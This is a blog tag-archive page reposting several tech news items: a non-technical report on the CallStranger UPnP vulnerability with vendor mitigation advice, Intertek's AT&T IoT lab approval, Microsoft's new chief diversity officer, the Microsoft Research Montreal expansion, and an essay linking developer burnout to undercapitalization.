Tag Archives: named

‘CallStranger’ vulnerability affects billions of UPNP devices

A newly disclosed vulnerability named “CallStranger” affects billions of connected devices and can be exploited to steal data or initiate large-scale DDoS attacks.

CallStranger was disclosed Monday by Yunus Çadırcı, senior cybersecurity manager at EY Turkey. The vulnerability affects the Universal Plug and Play (UPNP) protocol, which is widely used by a variety for devices, from enterprise routers and IoT devices to video game consoles and smart TVs.

“The vulnerability — CallStranger — is caused by Callback header value in UPnP SUBSCRIBE function can be controlled by an attacker and enables an SSRF [server-side request forgery]-like vulnerability, which affects millions of Internet facing and billions of LAN devices,” Çadırcı wrote on the research site.

The vulnerability, CVE-2020-12695, can allow unauthorized users to bypass security products such DLP and exfiltrate data or abuse connected devices for DDoS attacks that use TCP amplification.

Çadırcı said data exfiltration is the “biggest risk” for enterprises and advised organizations to check their logs for suspicious activity around UPNP. The threat to consumer devices, he said, is lower but those devices could be compromised and used for DDoS attacks against larger organizations. ” Because it also can be used for DDoS, we expect botnets will start implementing this new technique by consuming end user devices,” he wrote.

The UPNP protocol was started in 1999 by an industry initiative known as the UPnP Forum; the protocol was designed to simplify network connections for homes and corporate environments. The Open Connectivity Foundation, which assumed control of protocol in 2016, updated its UPNP 2.0 specification in April to address the vulnerability.

However, patches have not yet been released for CallStranger.

“Because this is a protocol vulnerability, it may take a long time for vendors to provide patches,” Çadırcı wrote.

Many connected devices will need firmware updates to resolve CallStranger, and IoT devices have historically been difficult to patch because some products are shipped without the ability to receive and install such updates.

In a post on CallStranger, vulnerability management vendor Tenable said it expects more vulnerable devices to be identified and patched as time goes on.

“[M]anufacturers of affected devices are in the process of determining its impact,” Tenable wrote in the blog post. “As a result, we anticipate newly affected devices will be reported and patches will be released over time for devices still receiving product support.”

In the meantime, Çadırcı advised enterprises to “take their own actions” by blocking UPNP ports for connected devices that don’t need the functionality and blocking all SUBSCRIBE and NOTIFY HTTP packets in ingress and egress traffic to security products. In addition, he recommended ISPs block access to widely used UPnP control and eventing ports that are accessible on the public internet.

Çadırcı first discovered the vulnerability late last year and reported it to the Open Connectivity Foundation on Dec. 12. Public disclosure of CallStranger was pushed back several times beyond the traditional 90-day deadline because several vendors and ISPs requested more time.

The CallStranger research site lists a number of vulnerable products from leading vendors such as Microsoft, Cisco, Broadcom and Samsung, as well as a list of additional devices that could be affected but have yet to be confirmed by the vendors.

Go to Original Article

Intertek joins AT&T IoT Accelerator Program

Intertek has been named a preferred testing and certification laboratory for the AT&T IoT Accelerator Program. It is the first U.S. lab approved as part of this program, which offers AT&T network certification testing to vendors who want to launch IoT devices on the AT&T network.

The program offers low-cost LTE modules certified for the AT&T network.

Intertek was named as an approved laboratory because of its experience with connected products and ability to guide device makers through the process. Intertek will also conduct pre-testing and testing activities, fulfill research and development requests, complete documentation needs and navigate the submission and approval process.

Other approved labs include 7 Layers, Cetecom, CTTL/ATMCL, Dekra, PCTest, SGS SA, Sporton International and UL LLC.

The IoT market is ever-growing, with Grand View Research predicting that the IoT global market will reach $949.42 billion by 2025, with a compound annual growth rate of 29.4% during that time period. It attributes that growth to the rising demand for machine-to-machine technology systems, desire for predictive maintenance and people’s need to contextualize the operation technology data.

In August, Microsoft reported that IoT adoption has grown significantly, particularly in commercial, enterprise-grade organizations. In its report, Microsoft claimed enterprise IoT adoption makes economic success certain, and that businesses can expect a 30% ROI within three years of IoT implementation.

Due to the seemingly lucrative and popular IoT trend, AT&T is not the only organization with an IoT accelerator program. Soracom also offers one, as does Plug and Play, among many others.

Soracom’s program also aims to help developers get products built and into production quickly and economically. It works with partners such as Carbon Five, Breadware, Microsoft Azure, Amazon Web Services, PubNub, Seeed and the Igor Institute.

Plug and Play brands itself as an innovation platform, aiming to bring together IoT startups and large corporations. It hosts accelerator programs over 50 times a year, with each lasting for 12 weeks. It gives startups the chance to build corporate clients and meet mentors and investors. Plug and Play’s IoT corporate partners include Panasonic, ADT, Fujitsu, Nintendo, Maxell and more.

Go to Original Article

Microsoft names Lindsay-Rae McIntyre Chief Diversity Officer

REDMOND, Wash. – Feb. 11, 2018 Microsoft Corp. has named Lindsay-Rae McIntyre as its next chief diversity officer (CDO). As CDO, McIntyre will implement and drive a multitude of existing cross-company initiatives to further Microsoft’s progress in building a diverse and inclusive culture. In addition to leading Microsoft’s efforts internally, McIntyre will also play a key role in building partnerships and working with leading organizations outside of Microsoft to help advance diversity and inclusion in the tech sector overall.

While transition timing has yet to be finalized, McIntyre will relocate to Microsoft’s headquarters in Redmond, Washington, and report directly to Kathleen Hogan, Chief People Officer. 

Lindsay-Rae McIntyreMcIntyre joins Microsoft from IBM, where she spent over two decades serving as the HR leader for several business units over the years in key regions around the world. She most recently held the role of Chief Diversity Officer and Vice President of HR, leading the diversity agenda globally for IBM, and heading up the corporate processes to identify and advance executive talent. Her work and that of her team’s has been acknowledged through a variety of prestigious diversity-related awards.

“Diversity enriches our performance and products as well as the communities where we live and work,” said Hogan.  “We have devoted substantial energy and resources to becoming a more diverse and inclusive company, and continuing our progress is central to our evolving culture at Microsoft.  With her extensive expertise, Lindsay-Rae will bring great perspective and leadership as we look to build on our strengths in this area.”

“I am excited to join Microsoft, a company that has not only adapted well to rapid change in the business landscape but elevated the standards of what we can expect in a technology provider when it comes to diversity and inclusion,” McIntyre said. “I look forward to advancing that agenda and contributing to the foundation Microsoft is building.”

McIntyre received a Bachelor of Arts degree with highest honors from the University of North Carolina at Chapel Hill, where she was a Morehead Scholar, and graduated from the Cross Continent MBA Program at the Fuqua School of Business at Duke University.

She has been a thought leader for topics ranging from supporting working mothers, creating great places to work for multicultural women, LGBTQ equality, paid leave, and flex time strategies. She is also an advocate for people with disabilities, was a teacher for the Deaf, and taught American Sign Language earlier in her career.

McIntyre has spent over 20 years in human resources in the technology industry, living and working throughout the U.S. and overseas. She and her husband Stephen have three small children. 

About Microsoft
Microsoft (Nasdaq “MSFT” @microsoft) is the leading platform and productivity company for the mobile-first, cloud-first world, and its mission is to empower every person and every organization on the planet to achieve more.

The post Microsoft names Lindsay-Rae McIntyre Chief Diversity Officer appeared first on Stories.

Microsoft announces expansion of Montreal research lab, new director

Geoffrey Gordon has been named Microsoft Research Montreal’s new research director. Photo by Nadia Zheng.

Microsoft plans to significantly expand its Montreal research lab and has hired a renowned artificial intelligence expert, Geoffrey Gordon, to be the lab’s new research director.

The company said Wednesday that it hopes to double the size of Microsoft Research Montreal within the next two years, to as many as 75 technical experts. The expansion comes as Montreal is becoming a worldwide hub for groundbreaking work in the fields of machine learning and deep learning, which are core to AI advances.

“Montreal is really one of the most exciting places in AI right now,” said Jennifer Chayes, a technical fellow and managing director of Microsoft Research New England, New York City and Montreal.

Chayes said Gordon, currently a professor of machine learning at Carnegie Mellon University, was a natural choice for the job in part because he’s interested in both the foundational AI research that addresses fundamental AI challenges and the applied work that can quickly find its way into mainstream use.

“We want to be doing the research that will be infusing AI into Microsoft products today and tomorrow, and Geoff’s research really spans that,” she said. “He’ll be able to help us improve our products and he’ll also be laying the foundation for AI to do much more than is possible today.”

Jennifer Chayes, technical fellow and managing director of Microsoft Research New England, New York City and Montreal.

Chayes also noted that Gordon’s broad and deep AI expertise will be a major asset to the lab. She noted that Gordon is an expert in reinforcement learning, in which systems learn through trial and error, and he’s also done groundbreaking work in areas such as robotics and natural language processing. The ability to combine all those areas of expertise will be key to developing sophisticated AI systems in the future.

“Given that we want a very broad AI lab, Geoff is the ideal person to lead it, and to create the fundamental research that underlies the next generation of AI,” she said.

Gordon said he’s especially interested in creating AI systems that have what we think of as long-term thinking: the ability to come up with a coherent plan to solve a problem or to take multiple actions based on clues it gets along the way. That’s the kind of thing that comes easily to people but is currently rudimentary in most AI systems.

Over the last few years, AI systems have gotten very good at individual tasks, like recognizing images or comprehending words in a conversation, thanks to a combination of improved data, computing power and algorithms.

Now, researchers including Gordon are working on ways to combine those skills to create systems that can augment people’s work in more sophisticated ways. For example, a system that could accurately read clues based on what it is seeing and hearing to anticipate when it would be useful to step in and help would be much more valuable than one that requires a person to ask for help with a specific task when needed.

“We have, in some cases, superhuman performance in recognizing patterns, and in very restricted domains we get superhuman performance in planning ahead,” he said. “But it’s surprisingly difficult to put those two things together – to get an AI to learn a concept and then build a chain of reasoning based on that learned concept.”

Microsoft began developing its research presence in Montreal a year ago, when it acquired the deep learning startup Maluuba.

The Microsoft Research team in Montreal has already made groundbreaking advances in AI disciplines that are key to the type of systems Gordon imagines. That includes advances in machine reading comprehension – the ability to read a document and provide information about it in a plainspoken way – and in methods for teaching AI systems to do complex tasks, such as by dividing large tasks into small tasks that multiple AI agents can handle.

Gordon said he was drawn to the new position both because of the work the team in Montreal is doing and the opportunity to collaborate with the broader Montreal AI community.

“Research has always been about standing on the shoulders of giants, to borrow a phrase from a giant – and it’s even more so in the current age,” Gordon said.

The city has become a hotbed for AI advances thanks to a strong academic and research presence, as well as government funding commitments.

Yoshua Bengio, an AI pioneer who heads the Montreal Institute for Learning Algorithms, said Gordon’s presence and the Microsoft lab’s expansion will help continue to build the momentum that the Montreal AI community has seen in recent years. He noted that Gordon’s area of focus, on AI systems that can learn to do more complex tasks, is complementary to the work he and others in the community also are pursuing.

“It’s one of the strengths of Montreal,” said Bengio, who is also an AI advisor to Microsoft.

Joelle Pineau, an associate professor of computer science at McGill University and director of Montreal’s Facebook AI Research Lab, said she was thrilled to hear Gordon would be joining the Montreal AI ecosystem.

“There is no doubt that the Montreal AI community will be deeply enriched by his presence here,” Pineau said.

Navdeep Bains, Canada’s minister of innovation, science and economic development, said he was looking forward to seeing the work that Gordon and Microsoft Research Montreal will produce.

“I am pleased that our government’s investment in innovation and skills continues to position Canada as a world-leading destination for AI companies and impressive researchers like Geoff Gordon,” he said.

The expansion of the Montreal lab is part of Microsoft’s long history of investing in international research hubs, including labs in the U.S., Asia, India and Cambridge, United Kingdom. Chayes said the company’s international presence has helped it attract and retain some of the world’s best researchers in AI and other fields, and it also has helped ensure that the company’s AI systems reflect a diversity of experiences and cultures.

For example, Chayes said the fact that Montreal is a bilingual city could help inform the company’s work in areas such as translation and speech recognition.

“It’s a culture where you go back and forth between two languages. That’s a very interesting environment in which to develop tools for natural language understanding,” she said.

The French version of this blog post can be found on the Microsoft News Center Canada.


Allison Linn is a senior writer at Microsoft. Follow her on Twitter.

Undercapitalization is the disease, developer burnout the symptom

Imagine a DevOps engineer named Pat. You’re the vice president of engineering, and Pat has been a superstar in your organization for years. She’s always pleasant in standups. Any criticism she makes is positive and supportive. She’s always reliable when on call, and Pat makes few mistakes.

Then, something changes. She becomes snippy in standups. It’s taking her longer to answer emails. Last month, she altered a deployment script that caused the Amazon bill to jump. You sense something is wrong, so you go to her boss.

Pat’s boss reports having a similar experience. Pat, who used to be the poster child for an exemplary DevOps engineer, is dramatically regressing. You’re both mystified.

Something is obviously amiss. You ask to see her work schedule over the last year and the tickets assigned to her. In addition, you take a trip to HR and request the budget history of the group Pat works in, as well as the head count history.

As you review the reports, certain facts pop out. First, Pat has not had a vacation in the last year. Also, her last raise was only 3% due to company revenue issues. Half of Pat’s past work tickets involved issues related to the new automated container-provisioning framework the company implemented last year.

Pat is burnt out. Now, conventional wisdom has a way to prevent burnout. Just give employees enough time to rest, refresh and acquire the skills necessary to do the work required of them. This is the route organizations typically take to addressing developer burnout. And this is the flaw: Organizations are addressing the symptoms.

The disease is undercapitalization.

Allow me to elaborate.

No capital? No profit

Capital is anything that enhances a person’s or organization’s ability to perform economically useful work. Capital can take the form of money, time, machinery, information or real estate, for example. Businesses require capital in order to make goods and provide services. The mistake many businesses make is to not have enough capital on hand to meet objectives. This is particularly true of startups. I’ve experienced this personally.

Earlier in my life, I wanted to be in the restaurant business. I had the necessary expertise. So, I saved some money and found some investors to pitch in to cover the startup costs and projected operating expenses for a year.

However, my business plan had a serious flaw: I overestimated revenue growth. I thought my cash flow would start to cover expenses within three months of operation. Turns out I was wrong. I was not getting the number of customers needed within the time frame required.

I started to run out of money. I fell behind paying my bills. I had to cut back on staff. I found myself working seven days a week to make up for the staff I had to lay off.

I didn’t have the capital — in this case, time — to meet my objective.

Eventually, the business closed its doors. I was a mess physically and emotionally. Upon reflection, I came to realize I had just run out of time. My customer rate was growing, and the business was becoming more efficient. The shortcoming was I didn’t have the capital — in this case, time — to meet my objective.

Let’s go back to Pat and her burnout.

Pat had not had a vacation in a year. She had been given a small raise and was working with technology new to her and the organization. How did this come about?

Pat had not had a vacation in a year because the department is short-staffed. She had been given a pittance of a raise because the company couldn’t afford more. And she is struggling with new technology because the company needed to implement automated provisioning in order to meet the growth requirements necessary to stay competitive.

To put it succinctly:

No vacation = not enough staff = undercapitalization

Small raise = not enough money = undercapitalization

Struggling with new technology = not enough time = undercapitalization

The business does not have the capital required to meet its objective. And, thus, burnout sets in.

So, how does a company avoid burnout?

The answer is to make sure it meets its capital requirements.

This is easier said than done. Most companies think they have enough capital. Not surprisingly, most companies are overly optimistic, particularly small to medium-sized tech companies that have growing DevOps departments.

These companies get the value of DevOps, but underestimate the capital requirements necessary for success. Many follow the lean startup mentality — fewer employees using more automation, while getting more back massages at their desks and free food at the snack bar.

Providing automation, back massages and free food are not necessarily the best tactics for ensuring adequate capitalization. Having adequate capital on hand is a continuous activity that requires ongoing, dedicated attention. Just look at AT&T.

AT&T executives understood from its inception that the company was engaged in a capital-intensive business. Its leadership kept raising capital. In the beginning, the capital was needed to lay landlines. By the 1950s, the capital was used to put telecommunication satellites into space. Today, with the acquisition of DirecTV, the company is moving into on-demand video streaming. The company has a voracious appetite for capital, and it’s become quite good at acquiring it.

Developer burnout
Logz.io’s 2017 DevOps Pulse survey found that 70% of its respondents could see themselves burning out.

This is the lesson to be learned. Burnout, in general, and developer burnout, in particular, can be traced back to undercapitalization. Undercapitalization is rarely a temporary condition. Rather, it results from of a business failing to plan from the start to ensure its capital needs are always met. This means making sure there is enough money, time and staff to meet the demands at hand. Doing more with less rarely works for a long period of time. Eventually, a company will pay the price. One of the first signs is employee burnout.

We in DevOps know there is no way automation will make bad code better once it’s out the door. You need to get a new version out as soon as possible. The same is true of adequate capitalization. Once the symptoms set in, the only way to beat the disease is to release a new version of the business, with plans to continuously meet the business’s demand for the capital required to satisfy its objectives.